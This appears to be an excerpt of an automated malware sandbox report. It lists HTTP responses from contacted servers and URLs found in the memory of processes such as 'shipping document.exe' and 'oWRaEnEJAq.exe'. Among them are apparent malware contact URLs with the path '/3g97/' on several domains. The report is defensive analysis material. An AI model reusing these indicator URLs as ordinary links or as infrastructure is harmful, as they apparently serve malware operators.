Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 05:28:08 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i\|rO\|<0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 05:28:11 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1713936497.4153491690962646761X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 24 Apr 2024 05:28:17 GMTX-Served-By: cache-bur-kbur8200132-BURX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb7CuzCCL+dj8TnMJldQo94oVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1713936500.12634899652302646765X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 24 Apr 2024 05:28:20 GMTX-Served-By: cache-bur-kbur8200098-BURX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,9WD8GAcpJgs/Ng1WkD2i0h9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb7CuzCCL+dj8TnMJldQo94oVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1713936502.82334837651244156285X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 24 Apr 2024 05:28:22 GMTX-Served-By: cache-bur-kbur8200108-BURX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb6JxSuEU9PIuIbre7VUIJiyVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8X-Wix-Request-Id: 1713936505.5353489358346334572Age: 0Server: PepyakaX-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 24 Apr 2024 05:28:25 GMTX-Served-By: cache-bur-kbur8200142-BURX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_sea1_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb690urzQo8znCIRFiqxF/nR,2d58ifebGbosy5xc+FRalsfKRjkvyVNx6F/MgVi8KAXjsEimH09mQSUzjf+MlEbWutsYt+BqfLnLyvHX+3ZU2A==,2UNV7KOq4oGjA5+PKsX47HqjR+6CNmn/ng3r7CWVjR4=,R8nVwPJv9QJL1m78OROO+IV9oD+TXFc2vEfvXLHbcEY=,znHLAI6vxugFKypFMbJjolwf8wWTJVQybTnH7MNlwkYSO5XmrrCSQNDehIjmfew3bNsG/ydVSs9vBX3FVb1aSQ==Transfer-Encoding: chunkedVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 62 66 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e Data Ascii: bf1 <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' \| translate"></title> <meta name="description" conten
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:27:55 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 289Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 67 39 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 65 76 65 6c 73 74 65 70 2e 6f 6e 6c 69 6e 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:27:58 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 289Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 67 39 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 65 76 65 6c 73 74 65 70 2e 6f 6e 6c 69 6e 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:28:01 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 289Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 67 39 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 65 76 65 6c 73 74 65 70 2e 6f 6e 6c 69 6e 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:28:04 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 289Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 67 39 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 65 76 65 6c 73 74 65 70 2e 6f 6e 6c 69 6e 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>

Source: openfiles.exe, 00000007.00000002.4111642073.00000000054B6000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.00000000038B6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://a-two-spa-salon.com/3g97/?12l42=14Ldh71M1tAlq614
Source: openfiles.exe, 00000007.00000002.4111642073.0000000006146000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000004546000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://browsehappy.com/
Source: openfiles.exe, 00000007.00000002.4111642073.0000000005AFE000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000003EFE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://fedoraproject.org/
Source: firefox.exe, 00000009.00000002.2317219344.0000000019494000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://hostname.domain.tld/
Source: openfiles.exe, 00000007.00000002.4111642073.0000000005AFE000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000003EFE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://nginx.net/
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: shipping document.exe, 00000000.00000002.1681640369.0000000006410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com8
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: oWRaEnEJAq.exe, 00000008.00000002.4113195669.00000000057BE000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.tondex.finance
Source: oWRaEnEJAq.exe, 00000008.00000002.4113195669.00000000057BE000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.tondex.finance/3g97/
